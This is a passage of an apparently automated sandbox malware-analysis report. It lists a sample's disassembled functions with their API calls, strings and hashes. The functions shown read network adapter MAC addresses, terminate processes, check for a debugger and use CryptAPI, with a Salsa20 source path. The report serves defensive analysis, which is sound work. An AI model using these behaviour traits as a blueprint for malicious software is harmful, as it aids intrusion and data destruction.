                                                                                                                                                                        • Opcode Fuzzy Hash: b1c439f6932b88ecaadf07a0bc1e1c32a7f71427046d194defa802e4ff3f9874
                                                                                                                                                                        • Instruction Fuzzy Hash: 53418375944300AFD3105B759C86F6FBBF8FF8A711F000519FA54A62E1EBB198509BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E67F
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E68B
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E69E
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6A4
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6B9
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6C5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E6CD
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6E0
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E720
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E732
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E73C
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E745
                                                                                                                                                                        Strings
                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00B9E71A
                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 00B9E72D
                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00B9E699
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                        • Opcode ID: cba6928db5e988c5f3794dbca68e077fd93e0517ca07e454f08e6510bfbcdd2e
                                                                                                                                                                        • Instruction ID: fe354fcf72fe29bea5f86798f64e6156d9adcafe278811a170164074c585c8a1
                                                                                                                                                                        • Opcode Fuzzy Hash: cba6928db5e988c5f3794dbca68e077fd93e0517ca07e454f08e6510bfbcdd2e
                                                                                                                                                                        • Instruction Fuzzy Hash: D111E7B25146547FC671B2B45C12FFF7ADCCB46712F0405E5FA9CD2141E6989A0493B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA0160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1ACA
                                                                                                                                                                          • Part of subcall function 00BA1AB0: DispatchMessageW.USER32(?), ref: 00BA1AE0
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00BA0346
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BA0427
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00BA048E
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BA0514
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        • Opcode ID: 5222d9848895e28d9bc45253daecaa866ea57cbc8c22ac58387e009c50ead095
                                                                                                                                                                        • Instruction ID: 8cd4da067d078aee5aec50c885b8ed5bfce1c181cd3aca838f29502091c701e1
                                                                                                                                                                        • Opcode Fuzzy Hash: 5222d9848895e28d9bc45253daecaa866ea57cbc8c22ac58387e009c50ead095
                                                                                                                                                                        • Instruction Fuzzy Hash: 8342AF70D14208DBDF14EFA8C885BEEB7F5FF19308F2041A9E405A7251EB75AA45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                        • Opcode ID: 51fb04fddbfcb12c70fa28d42b75f693d33e52316a1e09bb6b00dea397bec6ed
                                                                                                                                                                        • Instruction ID: bba2004e6dd673320710f17899889a62ef68a838ff8181a5209c29749342ec4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 51fb04fddbfcb12c70fa28d42b75f693d33e52316a1e09bb6b00dea397bec6ed
                                                                                                                                                                        • Instruction Fuzzy Hash: 91B15970D142099BDF20EFA4C885BEEB7F5FF15318F1040B9E409AB251EB759A45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00BA244F
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA2469
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BA24A1
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00BA24B0
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24B7
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00BA24C1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                        • Opcode ID: 7fa27060f362950a91e05b77fc81629a72832a7e06b24d7fda0c708a054d8c76
                                                                                                                                                                        • Instruction ID: 2fee51e465a52a5aa8a25946172565f6704307948751eca5439f8dfcfd497352
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fa27060f362950a91e05b77fc81629a72832a7e06b24d7fda0c708a054d8c76
                                                                                                                                                                        • Instruction Fuzzy Hash: 210175395013157FEB206BA5AC8DFAF77ACEF49755F0000A1FE08E2141EB7499848AB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC82A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82B9
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82CA
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC82E6
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC8310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                                                                        • Opcode ID: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction ID: af220a9f957c7ab4669ff571d1338565ee1471354171915b10b35af14b5d9b51
                                                                                                                                                                        • Opcode Fuzzy Hash: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D014075204A26ABDB219E58DC89FDA37D8EF05B61F0080A9F504DB091EF70DA80C798
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B91000 Relevance: 7.6, Strings: 6, Instructions: 119COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                                                                                        • API String ID: 0-1714976780
                                                                                                                                                                        • Opcode ID: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                                                                        • Instruction ID: c4dd9fe4ee7d104fd1e03ce332917ea5feb217cedaef7a525328932c1bf9e322
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 49312527A145671BFF78587C988537D20C3D391370F2ACFBAD226D35D4E86A8D812250
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 00B9C095
                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00B9C090
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                        • Opcode ID: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction ID: f9419c5b257953f51ebc710c52b9fd8ef98630dac53ca46d658eac7932b2f1c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction Fuzzy Hash: C4C18CB5E002099FCF54CFA9C885ADEFBF1FF48300F24856AE919E7201E334AA558B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB4168 Relevance: 3.1, APIs: 2, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BB419D
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00BB4252
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DebuggerPresent_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2328436684-0
                                                                                                                                                                        • Opcode ID: 0de71eaad95679bd7a2f1b56466d29e36caddf8a80b71931b78e302736b454be
                                                                                                                                                                        • Instruction ID: 4b274d1d31462cd2095c36ada167d6c0df067541a7d05edc77490eedacd09ce4
                                                                                                                                                                        • Opcode Fuzzy Hash: 0de71eaad95679bd7a2f1b56466d29e36caddf8a80b71931b78e302736b454be
                                                                                                                                                                        • Instruction Fuzzy Hash: A131B27591122C9BCB21DF68D9897D8BBF8FF08310F5042EAE80CA6251EB749F858F45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00BA1190
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00BA11A0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                        • Opcode ID: bb8fe330c86f27ee1babf44cd88fbb85bbc5b8845599e0e369bc39b588387969
                                                                                                                                                                        • Instruction ID: 1f756c9a6ffbca087b03a49f552e63571a85d9afd1b099f434ae70ed511e6742
                                                                                                                                                                        • Opcode Fuzzy Hash: bb8fe330c86f27ee1babf44cd88fbb85bbc5b8845599e0e369bc39b588387969
                                                                                                                                                                        • Instruction Fuzzy Hash: 5BE04C78F443059BEF509F7DDC89B6F76E8AF55746F444854FA11F3280D628D841C521
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00B9EA69
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B9EA79
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                        • Opcode ID: 04ae04e873faa4b86ecc4056156a8f875b3ff2124808d8fa00a3e23b1c00ec12
                                                                                                                                                                        • Instruction ID: 46a21d581c007b4c0f45776ba2c4b4d2d9f43e672c00d2284770db9ad4de8246
                                                                                                                                                                        • Opcode Fuzzy Hash: 04ae04e873faa4b86ecc4056156a8f875b3ff2124808d8fa00a3e23b1c00ec12
                                                                                                                                                                        • Instruction Fuzzy Hash: C0E042B8F403059BDF10DBB99C89B6F76ECBB54B46B4404A4F815F22A4DA68D900CA21
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00B9EC80
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B9EC90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
